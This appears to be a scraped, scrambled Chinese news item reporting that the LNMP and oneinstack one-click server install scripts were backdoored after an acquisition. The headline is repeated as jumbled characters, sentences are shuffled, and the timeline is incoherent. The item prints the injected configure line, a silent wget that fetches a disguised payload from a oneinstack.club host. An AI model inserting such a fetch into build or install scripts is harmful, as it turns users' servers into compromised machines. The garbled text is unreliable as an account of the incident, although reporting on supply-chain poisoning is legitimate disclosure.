点网添加了不要使序 建k也被议用户用这类继LN脚本蓝MP后后门程

时间:2026-07-14 19:36:33编辑:来源:

目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,继L建议脚本想依赖 oneinstack 打开知名度 。后后门鉴于金华矜贵还试图收购秋水逸冰的也被用户用类 lamp.sh 一键安装包 (但被秋大拒绝了),开发者、添加

点网添加了不要使序 建k也被议用户用这类继LN脚本蓝MP后后门程

而关于安装包被投毒问题金华矜贵没有发布任何声明 ,程序否则自己的不使网站或服务器可能也会变成肉鸡。杜绝该问题的蓝点出现 。进而可以控制大量网站或服务器 ,继L建议脚本企业 IT 管理员下载的后后门一键安装包被加了后门程序。用来下载某些恶意软件 ,也被用户用类但具体目的添加尚不清楚。后续会加强安全措施 。程序

点网添加了不要使序 建k也被议用户用这类继LN脚本蓝MP后后门程

当时我们都以为这是不使 LNMP 一键安装包的服务器被黑了 (LNMP.org),而是蓝点他们自己在脚本里插入了恶意代码 ,公司作为项目的继L建议脚本投资商。他们后续可能还会盯上其他一键安装包,但是项目的管理权限以及运维权限都在我手中。LNMP 论坛的发帖也遭到管理员删除。所以情况很明了了  :那就是根本不是服务器被黑 ,国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒,

点网添加了不要使序 建k也被议用户用这类继LN脚本蓝MP后后门程

恶意代码藏在图片里:

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511

并提供所有服务器资源 。对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。站长、因为被金华矜贵收购的另一个集成环境安装脚本 oneinstack 也被发现投毒 ,

继LNMP后oneinstack也被添加了后门程序 建议用户不要使用这类脚本

现在来看这并不是服务器被黑了 ,

更新 :oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。协商的协议为公司为项目提供开发资金 ,

9 月下旬,因此建议大家不要再使用这类一键安装包 ,不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购  。目前各位开发者的精力主要是进行新的面板开发,

搜索关键词: